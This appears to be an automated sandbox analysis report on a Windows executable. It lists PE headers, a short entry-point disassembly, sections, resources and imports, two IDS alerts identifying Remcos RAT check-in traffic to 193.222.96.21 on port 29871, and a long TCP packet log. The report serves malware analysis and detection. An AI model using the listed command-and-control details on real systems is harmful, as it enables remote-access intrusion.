File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....z.W.................d...........2............@ |
Icon Hash: | 82aea280f0fcfc75 |
Entrypoint: | 0x4032a0 |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x57017AB6 [Sun Apr 3 20:19:02 2016 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | e2a592076b17ef8bfb48b7e03965a3fc |
Instruction |
---|
sub esp, 000002D4h |
push ebx |
push esi |
push edi |
push 00000020h |
pop edi |
xor ebx, ebx |
push 00008001h |
mov dword ptr [esp+14h], ebx |
mov dword ptr [esp+10h], 0040A2E0h |
mov dword ptr [esp+1Ch], ebx |
call dword ptr [004080B0h] |
call dword ptr [004080ACh] |
cmp ax, 00000006h |
je 00007FF9C91B8023h |
push ebx |
call 00007FF9C91BB164h |
cmp eax, ebx |
je 00007FF9C91B8019h |
push 00000C00h |
call eax |
mov esi, 004082B8h |
push esi |
call 00007FF9C91BB0DEh |
push esi |
call dword ptr [0040815Ch] |
lea esi, dword ptr [esi+eax+01h] |
cmp byte ptr [esi], 00000000h |
jne 00007FF9C91B7FFCh |
push ebp |
push 00000009h |
call 00007FF9C91BB136h |
push 00000007h |
call 00007FF9C91BB12Fh |
mov dword ptr [00434EE4h], eax |
call dword ptr [0040803Ch] |
push ebx |
call dword ptr [004082A4h] |
mov dword ptr [00434F98h], eax |
push ebx |
lea eax, dword ptr [esp+34h] |
push 000002B4h |
push eax |
push ebx |
push 0042B208h |
call dword ptr [00408188h] |
push 0040A2C8h |
push 00433EE0h |
call 00007FF9C91BAD18h |
call dword ptr [004080A8h] |
mov ebp, 0043F000h |
push eax |
push ebp |
call 00007FF9C91BAD06h |
push ebx |
call dword ptr [00408174h] |
add word ptr [eax], 0000h |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8610 | 0xa0 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x54000 | 0x283d0 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b4 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x637b | 0x6400 | 967d0e18ece4b8dcc63ec9d544660136 | False | 0.671484375 | data | 6.484796945043301 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x8000 | 0x14b0 | 0x1600 | d6b0bc2db2de2a3dd996fda6539cef0e | False | 0.4401633522727273 | data | 5.033673390997287 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xa000 | 0x2afd8 | 0x600 | 2aa587c909999ca52be17d0f1ffbd186 | False | 0.5188802083333334 | data | 4.039551377217298 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.ndata | 0x35000 | 0x1f000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x54000 | 0x283d0 | 0x28400 | 1ae715fef83c68eac2d6a2aa7a20fec2 | False | 0.28579313858695654 | data | 5.764915315933482 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0x54358 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.20579971607713238 |
RT_ICON | 0x64b80 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.3141948707168383 |
RT_ICON | 0x6e028 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.34639556377079483 |
RT_ICON | 0x734b0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.31737128011336796 |
RT_ICON | 0x776d8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.42022821576763486 |
RT_ICON | 0x79c80 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.46083489681050654 |
RT_ICON | 0x7ad28 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.5704918032786885 |
RT_ICON | 0x7b6b0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6108156028368794 |
RT_DIALOG | 0x7bb18 | 0x100 | data | English | United States | 0.5234375 |
RT_DIALOG | 0x7bc18 | 0x11c | data | English | United States | 0.6056338028169014 |
RT_DIALOG | 0x7bd38 | 0xc4 | data | English | United States | 0.5918367346938775 |
RT_DIALOG | 0x7be00 | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0x7be60 | 0x76 | data | English | United States | 0.7542372881355932 |
RT_VERSION | 0x7bed8 | 0x1b8 | COM executable for DOS | English | United States | 0.5295454545454545 |
RT_MANIFEST | 0x7c090 | 0x340 | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384 |
DLL | Import |
---|---|
KERNEL32.dll | SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW |
USER32.dll | GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow |
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW |
ADVAPI32.dll | RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW |
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create |
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/19/24-19:12:11.492624 | TCP | 2032777 | ET TROJAN Remcos 3.x Unencrypted Server Response | 29871 | 49738 | 193.222.96.21 | 192.168.2.4 |
04/19/24-19:12:11.262632 | TCP | 2032776 | ET TROJAN Remcos 3.x Unencrypted Checkin | 49738 | 29871 | 192.168.2.4 | 193.222.96.21 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 19, 2024 19:12:08.806940079 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:08.806982040 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:08.807054043 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:08.860527992 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:08.860551119 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.092659950 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.092856884 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.238075972 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.238097906 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.238985062 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.239056110 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.289612055 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.336118937 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.414328098 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.414452076 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.414565086 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.414613008 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.414628029 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.414732933 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.414741039 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.414768934 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.414814949 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.414865971 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.414875031 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.414943933 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.414952040 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.415038109 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.415047884 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.415115118 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.415122032 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.415216923 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.415225029 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.415294886 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.415302038 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.415383101 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.415394068 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.415410042 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.415487051 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.415499926 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.415579081 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.415962934 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.416047096 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.416054010 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.416126966 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.416134119 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.416225910 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.416232109 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.416301012 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.416307926 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.416331053 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.416412115 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.416920900 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.416992903 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.417025089 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.417113066 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.417119980 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.417191029 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.417205095 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.417284966 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.417292118 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.417361975 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.417812109 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.417886019 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.417897940 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.417969942 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.417983055 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.418076992 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.418083906 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.418153048 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.418159008 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.418242931 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.418250084 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.418318033 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.418740988 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.418819904 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.418827057 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.418895960 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.418903112 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.418988943 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.418994904 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.419064999 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.419070959 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.419154882 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.419517994 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.419596910 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.419615984 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.419675112 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.419698000 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.419768095 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.419780016 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.419845104 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.419861078 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.419938087 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.420654058 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.420737028 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.518598080 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.518696070 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.519109011 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.519176960 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.519212961 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.519278049 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.520042896 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.520126104 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.520163059 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.520220041 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.520875931 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.520946980 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.520981073 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.521044970 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.521802902 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.521869898 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.521898985 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.521951914 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.522767067 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.522830009 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.522861004 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.522927046 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.523473024 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.523542881 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.523567915 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.523622990 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.524630070 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.524697065 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.524736881 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.524810076 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.525425911 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.525491953 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.622899055 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.623059034 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.623092890 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.623106003 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.623231888 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.623678923 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.623791933 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.623811960 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.623897076 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.623919964 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.623996973 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.624016047 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.624102116 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.624597073 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.624686956 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.625231981 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.625328064 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.625334978 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.625366926 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.625410080 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.625461102 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.626044035 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.626141071 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.626141071 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.626168013 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.626230001 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.626971960 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.627064943 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.627074003 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.627099037 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.627156019 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.627194881 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.627875090 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.627968073 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.628740072 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.628837109 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.628959894 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.629053116 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.629062891 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.629137993 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.629833937 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.629926920 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.629935026 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.629957914 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.630007982 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.630053997 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.630717993 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.630810976 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
Apr 19, 2024 19:12:09.631550074 CEST | 443 | 49737 | 104.21.60.38 | 192.168.2.4 |
Apr 19, 2024 19:12:09.631643057 CEST | 49737 | 443 | 192.168.2.4 | 104.21.60.38 |
